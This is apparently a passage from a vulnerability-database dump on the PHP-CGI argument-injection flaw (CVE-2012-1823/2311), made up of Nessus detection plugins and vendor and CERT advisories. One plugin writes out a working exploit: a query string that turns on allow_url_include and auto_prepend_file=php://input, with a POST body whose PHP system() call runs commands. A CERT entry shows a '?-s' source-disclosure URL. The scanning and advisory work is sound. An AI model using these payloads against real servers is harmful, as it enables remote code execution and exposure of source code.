"Fedora 15 : maniadrive-1.2-32.fc15.5 / php-5.3.13-1.fc15 / php-eaccelerator-0.9.6.1-9.fc15.5 (2012-7567)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "modified": "2012-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:15", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2012-7567.NASL", "href": "https://www.tenable.com/plugins/nessus/59265", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-7567.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59265);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_xref(name:\"FEDORA\", value:\"2012-7567\");\n\n script_name(english:\"Fedora 15 : maniadrive-1.2-32.fc15.5 / php-5.3.13-1.fc15 / php-eaccelerator-0.9.6.1-9.fc15.5 (2012-7567)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818907\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?330ef760\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081334.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a78f4509\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081335.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?978265c4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"maniadrive-1.2-32.fc15.5\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"php-5.3.13-1.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"php-eaccelerator-0.9.6.1-9.fc15.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T13:26:22", "description": "The PHP installation on the remote web server contains a flaw that\ncould allow a remote attacker to pass command-line arguments as part\nof a query string to the PHP-CGI program. This could be abused to\nexecute arbitrary code, reveal PHP source code, cause a system crash,\netc.", "edition": 27, "published": "2012-05-14T00:00:00", "title": "PHP PHP-CGI Query String Parameter Injection Arbitrary Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "modified": "2012-05-14T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_CGI_QUERY_STRING_CODE_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/59088", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59088);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_bugtraq_id(53388);\n script_xref(name:\"CERT\", value:\"520827\");\n script_xref(name:\"EDB-ID\", value:\"18834\");\n\n script_name(english:\"PHP PHP-CGI Query String Parameter Injection Arbitrary Code Execution\");\n script_summary(english:\"Tests to execute arbitrary code\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a version of PHP that allows arbitrary\ncode execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The PHP installation on the remote web server contains a flaw that\ncould allow a remote attacker to pass command-line arguments as part\nof a query string to the PHP-CGI program. This could be abused to\nexecute arbitrary code, reveal PHP source code, cause a system crash,\netc.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/archive/2012.php#id2012-05-08-1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.3.13\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.4.3\");\n # https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_lotus_foundations_php_argument_command_injection_cve_2012_18234?lang=en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?80589ce8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21620314\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using Lotus Foundations, upgrade the Lotus Foundations operating\nsystem to version 1.2.2b or later. \n\nOtherwise, upgrade to PHP 5.3.13 / 5.4.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nos = get_kb_item(\"Host/OS\");\nfiles = get_kb_list(\"www/\" + port + \"/content/extensions/php*\");\n\nif (isnull(files)) file = \"/index.php\";\nelse\n{\n files = make_list(files);\n file = files[0];\n}\n\n# Try to exploit the issue to run a command.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig /all'] = \"Subnet Mask\";\n\n\nurl = file + \"?\" +\n \"-d allow_url_include=on \"+\n \"-d safe_mode=off \"+\n \"-d suhosin.simulation=on \"+\n \"-d open_basedir=off \"+\n \"-d auto_prepend_file=php://input \" +\n \"-n\";\nurl = str_replace(find:\" \", replace:\"+\", string:url);\nurl = urlencode(\n str:url, \n unreserved:\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~*'()-]/?+\"\n);\ntoken = (SCRIPT_NAME - \".nasl\") + \"-\" + unixtime();\n\nforeach cmd (cmds)\n{\n payload = \"<?php echo '\" + token + \"'; system('\" + cmd + \"'); die; ?>\";\n\n res = http_send_recv3(\n port : port,\n method : \"POST\",\n item : url,\n data : payload,\n content_type : \"application/x-www-form-urlencoded\",\n exit_on_fail : TRUE\n );\n\n if (\n token >< res[2] &&\n egrep(pattern:cmd_pats[cmd], string:res[2])\n )\n {\n if (report_verbosity > 0)\n {\n report = \n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) +\n '\\n' + http_last_sent_request() +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n';\n\n if (report_verbosity > 1)\n {\n output = strstr(res[2], token) - token;\n\n report +=\n '\\n' + 'This produced the following output :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) +\n '\\n' + data_protection::sanitize_uid(output:chomp(output)) +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n}\nexit(0, \"The web server listening on port \" + port + \" is not affected.\");\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:C/I:P/A:P"}}, {"lastseen": "2021-01-01T06:37:53", "description": "It was discovered that PHP, when used as a stand alone CGI processor\nfor the Apache Web Server, did not properly parse and filter query\nstrings. This could allow a remote attacker to execute arbitrary code\nrunning with the privilege of the web server. Configurations using\nmod_php5 and FastCGI were not vulnerable.\n\nThis update addresses the issue when the PHP CGI interpreter is\nconfigured using mod_cgi and mod_actions as described in\n/usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate\nconfiguration is used to enable PHP CGI processing, it should be\nreviewed to ensure that command line arguments cannot be passed to the\nPHP interpreter. Please see CVE-2012-2311 for more details and\npotential mitigation approaches.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2012-05-07T00:00:00", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 / 12.04 LTS : php5 vulnerability (USN-1437-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1437-1.NASL", "href": "https://www.tenable.com/plugins/nessus/59016", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1437-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59016);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_xref(name:\"USN\", value:\"1437-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 / 12.04 LTS : php5 vulnerability (USN-1437-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that PHP, when used as a stand alone CGI processor\nfor the Apache Web Server, did not properly parse and filter query\nstrings. This could allow a remote attacker to execute arbitrary code\nrunning with the privilege of the web server. Configurations using\nmod_php5 and FastCGI were not vulnerable.\n\nThis update addresses the issue when the PHP CGI interpreter is\nconfigured using mod_cgi and mod_actions as described in\n/usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate\nconfiguration is used to enable PHP CGI processing, it should be\nreviewed to ensure that command line arguments cannot be passed to the\nPHP interpreter. Please see CVE-2012-2311 for more details and\npotential mitigation approaches.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1437-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php5-cgi package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|11\\.04|11\\.10|12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 11.04 / 11.10 / 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.4-2ubuntu5.24\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.2-1ubuntu4.15\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.5-1ubuntu7.8\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"php5-cgi\", pkgver:\"5.3.6-13ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.10-1ubuntu3.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5-cgi\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2020-11-15T18:45:30", "bulletinFamily": "info", "cvelist": ["CVE-2012-2329"], "description": "Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n\u2014 \n\u201d`\n\n## References\n\n<http://www.php.net/ChangeLog-5.php#5.4.3> \nFixed bug #61807 Buffer Overflow in apache_request_headers, CVE-2012-2329. => Bug private at the moment of writing\n\n<http://www.securityfocus.com/bid/53455>\n\nRedhat, include patches: \n<https://bugzilla.redhat.com/show_bug.cgi?id=820000>\n", "modified": "2020-02-13T00:00:00", "published": "2012-05-11T00:00:00", "id": "AKB:0E540893-4BAD-42B2-9EEE-658ADE8002D8", "href": "https://attackerkb.com/topics/EGPyAoig1k/cve-2012-2329-php-apache-request-headers", "type": "attackerkb", "title": "CVE-2012-2329 PHP Apache Request Headers", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "postgresql": [{"lastseen": "2020-12-24T14:27:32", "bulletinFamily": "software", "cvelist": ["CVE-2012-2143"], "description": "Passwords containing the byte 0x80 passed to the crypt() function in pgcrypto are incorrectly truncated if DES encryption was used", "edition": 3, "modified": "2012-07-05T14:55:00", "published": "2012-07-05T14:55:00", "href": "https://www.postgresql.org/support/security/9.1/", "id": "POSTGRESQL:CVE-2012-2143", "type": "postgresql", "title": "Vulnerability in contrib module (CVE-2012-2143)", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "amazon": [{"lastseen": "2020-11-10T12:36:35", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2386", "CVE-2012-2143"], "description": "**Issue Overview:**\n\nInteger overflow in the phar_parse_tarfile function in tar.c in the phar extension in PHP before 5.3.14 and 5.4.x before 5.4.4 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted tar file that triggers a heap-based buffer overflow. \n\nThe crypt_des (aka DES-based crypt) function in FreeBSD before 9.0-RELEASE-p2, as used in PHP, PostgreSQL, and other products, does not process the complete cleartext password if this password contains a 0x80 character, which makes it easier for context-dependent attackers to obtain access via an authentication attempt with an initial substring of the intended password, as demonstrated by a Unicode password.\n\n \n**Affected Packages:** \n\n\nphp\n\n \n**Issue Correction:** \nRun _yum update php_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php-intl-5.3.14-2.21.amzn1.i686 \n php-mysql-5.3.14-2.21.amzn1.i686 \n php-mbstring-5.3.14-2.21.amzn1.i686 \n php-xmlrpc-5.3.14-2.21.amzn1.i686 \n php-recode-5.3.14-2.21.amzn1.i686 \n php-xml-5.3.14-2.21.amzn1.i686 \n php-embedded-5.3.14-2.21.amzn1.i686 \n php-mcrypt-5.3.14-2.21.amzn1.i686 \n php-bcmath-5.3.14-2.21.amzn1.i686 \n php-dba-5.3.14-2.21.amzn1.i686 \n php-odbc-5.3.14-2.21.amzn1.i686 \n php-soap-5.3.14-2.21.amzn1.i686 \n php-debuginfo-5.3.14-2.21.amzn1.i686 \n php-tidy-5.3.14-2.21.amzn1.i686 \n php-devel-5.3.14-2.21.amzn1.i686 \n php-snmp-5.3.14-2.21.amzn1.i686 \n php-pgsql-5.3.14-2.21.amzn1.i686 \n php-process-5.3.14-2.21.amzn1.i686 \n php-fpm-5.3.14-2.21.amzn1.i686 \n php-mysqlnd-5.3.14-2.21.amzn1.i686 \n php-ldap-5.3.14-2.21.amzn1.i686 \n php-5.3.14-2.21.amzn1.i686 \n php-pspell-5.3.14-2.21.amzn1.i686 \n php-imap-5.3.14-2.21.amzn1.i686 \n php-mssql-5.3.14-2.21.amzn1.i686 \n php-common-5.3.14-2.21.amzn1.i686 \n php-cli-5.3.14-2.21.amzn1.i686 \n php-pdo-5.3.14-2.21.amzn1.i686 \n php-gd-5.3.14-2.21.amzn1.i686 \n \n src: \n php-5.3.14-2.21.amzn1.src \n \n x86_64: \n php-mssql-5.3.14-2.21.amzn1.x86_64 \n php-cli-5.3.14-2.21.amzn1.x86_64 \n php-fpm-5.3.14-2.21.amzn1.x86_64 \n php-pgsql-5.3.14-2.21.amzn1.x86_64 \n php-common-5.3.14-2.21.amzn1.x86_64 \n php-bcmath-5.3.14-2.21.amzn1.x86_64 \n php-embedded-5.3.14-2.21.amzn1.x86_64 \n php-xmlrpc-5.3.14-2.21.amzn1.x86_64 \n php-recode-5.3.14-2.21.amzn1.x86_64 \n php-gd-5.3.14-2.21.amzn1.x86_64 \n php-pspell-5.3.14-2.21.amzn1.x86_64 \n php-odbc-5.3.14-2.21.amzn1.x86_64 \n php-5.3.14-2.21.amzn1.x86_64 \n php-mbstring-5.3.14-2.21.amzn1.x86_64 \n php-soap-5.3.14-2.21.amzn1.x86_64 \n php-intl-5.3.14-2.21.amzn1.x86_64 \n php-devel-5.3.14-2.21.amzn1.x86_64 \n php-ldap-5.3.14-2.21.amzn1.x86_64 \n php-mysqlnd-5.3.14-2.21.amzn1.x86_64 \n php-dba-5.3.14-2.21.amzn1.x86_64 \n php-debuginfo-5.3.14-2.21.amzn1.x86_64 \n php-xml-5.3.14-2.21.amzn1.x86_64 \n php-tidy-5.3.14-2.21.amzn1.x86_64 \n php-process-5.3.14-2.21.amzn1.x86_64 \n php-pdo-5.3.14-2.21.amzn1.x86_64 \n php-mcrypt-5.3.14-2.21.amzn1.x86_64 \n php-imap-5.3.14-2.21.amzn1.x86_64 \n php-mysql-5.3.14-2.21.amzn1.x86_64 \n php-snmp-5.3.14-2.21.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-07-05T16:09:00", "published": "2012-07-05T16:09:00", "id": "ALAS-2012-095", "href": "https://alas.aws.amazon.com/ALAS-2012-95.html", "title": "Medium: php", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:41:01", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "It was discovered that PHP, when used as a stand alone CGI processor \nfor the Apache Web Server, did not properly parse and filter query \nstrings. This could allow a remote attacker to execute arbitrary code \nrunning with the privilege of the web server. Configurations using \nmod_php5 and FastCGI were not vulnerable.\n\nThis update addresses the issue when the PHP CGI interpreter \nis configured using mod_cgi and mod_actions as described in \n/usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate \nconfiguration is used to enable PHP CGI processing, it should be \nreviewed to ensure that command line arguments cannot be passed to \nthe PHP interpreter. Please see CVE-2012-2311 for more details and \npotential mitigation approaches.", "edition": 5, "modified": "2012-05-04T00:00:00", "published": "2012-05-04T00:00:00", "id": "USN-1437-1", "href": "https://ubuntu.com/security/notices/USN-1437-1", "title": "PHP vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:39:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "when used in CGI mode remote attackers could inject command\n line arguments to php\n\n", "edition": 1, "modified": "2012-05-07T16:08:55", "published": "2012-05-07T16:08:55", "id": "OPENSUSE-SU-2012:0590-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00002.html", "title": "update for php5 (critical)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:42:00", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "### Overview \n\nPHP-CGI-based setups contain a vulnerability when parsing query string parameters from php files.\n\n### Description \n\nAccording to PHP's [website](<http://php.net/>), \"PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.\" When PHP is used in a CGI-based setup (such as Apache's `mod_cgid`), the `php-cgi` receives a processed query string parameter as command line arguments which allows command-line switches, such as `-s, -d or -c` to be passed to the `php-cgi` binary, which can be exploited to disclose source code and obtain arbitrary code execution.\n\nAn example of the `-s` command, allowing an attacker to view the source code of `index.php` is below: \n`<http://localhost/index.php?-s>` \n \nAdditional information can be found in the vulnerability reporter's [blog post](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>). \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker could obtain sensitive information, cause a denial of service condition or may be able to execute arbitrary code with the privileges of the web server. \n \n--- \n \n### Solution \n\n**Apply update** \n \nPHP has released version 